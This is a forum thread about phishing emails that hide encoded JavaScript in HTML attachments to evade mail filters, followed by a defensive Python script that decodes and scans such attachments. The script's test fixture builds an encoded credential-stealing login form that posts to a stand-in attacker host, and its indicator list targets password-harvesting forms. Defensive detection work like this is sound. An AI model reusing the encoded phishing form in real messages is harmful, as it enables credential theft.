Reliable Contributor marcus69
Message 1 of 2

Problem with embedded and encoded Javascripts

Hi all

This week we've discovered some mails using a nasty method to sneak through Email Gateway filters:

Mails come in pretending to have an embedded Excel spreadsheet hiding behind an Excel icon graphic.

Behind that there is an attached HTML file that contains an embedded and encoded JavaScript.

[Image: xls-fake.jpg]

Here's an excerpt of the source code within the html file:

[Image: sourcecode.jpg]

The Email Gateway does not detect any JavaScript by filetype here, as it is an HTML/txt document, and shows no offending code at first glance.

Unescaping the code sequence reveals a phishing site in this case.

In my opinion this is the pre-step of the next malware wave, as this bypasses AV engine and JavaScript filetype detection.

If these mails manage to get past the antispam and reputation filters, and you have no Web Gateway or Advanced Threat Defense, you may be doomed.

Best Regards,

   Marcus

PS: Did some enhanced testing on this. One solution can be to filter HTML attachments by filetype. HTML email content is not affected by this, only attachments.

1 Reply
runcmd
Message 2 of 2

Re: Problem with embedded and encoded Javascripts

I might be a day late and a dollar short on this one, but...  If you create a custom compliance dictionary that applies to everything and contains the strings "<script" and/or "</script>", and then add that dictionary to the "Spam Terms" component of the anti-spam settings for your inbound mail rule, wouldn't that help stop these?  That should block anything inbound that appears to contain a script.  (Unless you actually do need to receive some messages containing scripts.)
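A triage sketch for the attachments discussed in this thread, added here as an example and not code from either poster or from the Email Gateway product: it pulls HTML attachments out of a message, statically reverses `unescape()`-style percent encoding, and reports which indicators appear in the raw source versus the decoded layer. The indicator names, the threshold of four escapes, and the sample mail (including the `phish.example` host) are constructed assumptions; handling of `%uXXXX` escapes goes slightly beyond the plain `%XX` case.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from urllib.parse import quote, unquote

# Indicators looked for in the raw attachment and in every decoded layer (assumed set).
INDICATORS = {
    "script_tag": re.compile(r"<\s*script", re.I),
    "form_tag": re.compile(r"<\s*form", re.I),
    "password_field": re.compile(r"type\s*=\s*['\"]?password", re.I),
    "decode_call": re.compile(r"\b(?:unescape|decodeURIComponent)\s*\(", re.I),
}
PCT = re.compile(r"%(?:u[0-9a-fA-F]{4}|[0-9a-fA-F]{2})")

def js_unescape(s):
    """Static equivalent of JavaScript unescape(): %uXXXX and %XX to characters."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def layers(html, max_depth=5):
    """Raw text, then each layer obtained by unescaping heavily escaped strings."""
    out, current = [html], html
    for _ in range(max_depth):
        blobs = [b for b in re.split(r"['\"]", current) if len(PCT.findall(b)) >= 4]
        if not blobs:
            break
        current = "\n".join(js_unescape(b) for b in blobs)
        out.append(current)
    return out

def scan_message(raw_bytes):
    """Return {attachment name: [indicator names per layer]} for HTML attachments."""
    report = {}
    for part in message_from_bytes(raw_bytes, policy=policy.default).iter_attachments():
        name = part.get_filename() or "(unnamed)"
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            text = part.get_payload(decode=True).decode("utf-8", "replace")
            report[name] = [sorted(k for k, rx in INDICATORS.items() if rx.search(layer))
                            for layer in layers(text)]
    return report

def build_sample():
    """Constructed test mail: an HTML attachment whose visible source is only escapes."""
    hidden = '<form action="https://phish.example/login"><input type="password"></form>'
    html = '<html><script>document.write(unescape("%s"));</script></html>' % quote(hidden, safe="")
    msg = EmailMessage()
    msg.set_content("See attachment.")
    msg.add_attachment(html, subtype="html", filename="sheet.html")
    return msg.as_bytes()
```

Calling `scan_message(build_sample())` shows the credential form only in the second (decoded) layer, while the first layer contains just the script tag and the decode call.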
